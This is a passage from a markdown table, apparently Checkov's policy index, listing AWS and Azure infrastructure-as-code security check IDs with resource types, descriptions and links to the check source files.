[EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | -| 1467 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | -| 1468 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | 
[S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | -| 1469 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1470 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1471 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1472 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1473 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | -| 1474 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | 
Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1475 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1476 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | -| 1477 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | -| 1478 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | -| 1479 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1480 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | 
Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1481 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1482 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1483 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1484 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | -| 1485 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | -| 1486 | 
CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | -| 1487 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1488 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1489 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1490 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1491 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1492 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. 
| Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1493 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1494 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | -| 1495 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | -| 1496 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1497 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1498 | CKV2_AWS_60 | resource | aws_db_instance | Ensure RDS instance with copy tags to snapshots is enabled | Terraform | [RDSEnableCopyTagsToSnapshot.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSEnableCopyTagsToSnapshot.yaml) | -| 
1499 | CKV2_AWS_61 | resource | aws_s3_bucket | Ensure that an S3 bucket has a lifecycle configuration | Terraform | [S3BucketLifecycle.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLifecycle.yaml) | -| 1500 | CKV2_AWS_62 | resource | aws_s3_bucket | Ensure S3 buckets should have event notifications enabled | Terraform | [S3BucketEventNotifications.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEventNotifications.yaml) | -| 1501 | CKV2_AWS_63 | resource | aws_networkfirewall_firewall | Ensure Network firewall has logging configuration defined | Terraform | [NetworkFirewallHasLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NetworkFirewallHasLogging.yaml) | -| 1502 | CKV2_AWS_64 | resource | aws_kms_key | Ensure KMS key Policy is defined | Terraform | [KmsKeyPolicyIsDefined.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/KmsKeyPolicyIsDefined.yaml) | -| 1503 | CKV2_AWS_65 | resource | aws_s3_bucket_ownership_controls | Ensure access control lists for S3 buckets are disabled | Terraform | [AWSdisableS3ACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSdisableS3ACL.yaml) | -| 1504 | CKV2_AWS_66 | resource | aws_mwaa_environment | Ensure MWAA environment is not publicly accessible | Terraform | [AWS_private_MWAA_environment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWS_private_MWAA_environment.yaml) | -| 1505 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1506 | CKV_AZURE_1 | resource | 
Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Bicep | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1507 | CKV_AZURE_1 | resource | azurerm_linux_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1508 | CKV_AZURE_1 | resource | azurerm_virtual_machine | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | Terraform | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureInstancePassword.py) | -| 1509 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 1510 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | Bicep | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 1511 | CKV_AZURE_2 | resource | azurerm_managed_disk | Ensure Azure managed disk has encryption enabled | Terraform | [AzureManagedDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryption.py) | -| 1512 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | -| 1513 | CKV_AZURE_3 | resource | 
Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | Bicep | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1514 | CKV_AZURE_3 | resource | azurerm_storage_account | Ensure that 'enable_https_traffic_only' is enabled | Terraform | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsTransportEncryption.py) | -| 1515 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 1516 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | Bicep | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 1517 | CKV_AZURE_4 | resource | azurerm_kubernetes_cluster | Ensure AKS logging to Azure Monitoring is Configured | Terraform | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLoggingEnabled.py) | -| 1518 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 1519 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | Bicep | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 1520 | CKV_AZURE_5 | resource | azurerm_kubernetes_cluster | Ensure RBAC is enabled on AKS clusters | Terraform | 
[AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSRbacEnabled.py) | -| 1521 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 1522 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | Bicep | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 1523 | CKV_AZURE_6 | resource | azurerm_kubernetes_cluster | Ensure AKS has an API Server Authorized IP Ranges enabled | Terraform | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSApiServerAuthorizedIpRanges.py) | -| 1524 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 1525 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | Bicep | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 1526 | CKV_AZURE_7 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Network Policy configured | Terraform | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNetworkPolicy.py) | -| 1527 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | 
[AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 1528 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | Bicep | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 1529 | CKV_AZURE_8 | resource | azurerm_kubernetes_cluster | Ensure Kubernetes Dashboard is disabled | Terraform | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSDashboardDisabled.py) | -| 1530 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1531 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1532 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1533 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | Bicep | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 1534 | CKV_AZURE_9 | resource | azurerm_network_security_group | Ensure that RDP access is restricted from the internet | Terraform | 
[NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1535 | CKV_AZURE_9 | resource | azurerm_network_security_rule | Ensure that RDP access is restricted from the internet | Terraform | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py) | -| 1536 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1537 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1538 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1539 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | Bicep | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 1540 | CKV_AZURE_10 | resource | azurerm_network_security_group | Ensure that SSH access is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1541 | CKV_AZURE_10 | resource | azurerm_network_security_rule | Ensure that SSH access 
is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | -| 1542 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 1543 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 1544 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1545 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1546 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1547 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | -| 1548 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that 
Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1549 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1550 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1551 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1552 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1553 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1554 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater 
than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1555 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 1556 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | -| 1557 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1558 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1559 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1560 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1561 | CKV_AZURE_13 | resource | 
azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | -| 1562 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1563 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 1564 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 1565 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 1566 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1567 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | -| 1568 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App 
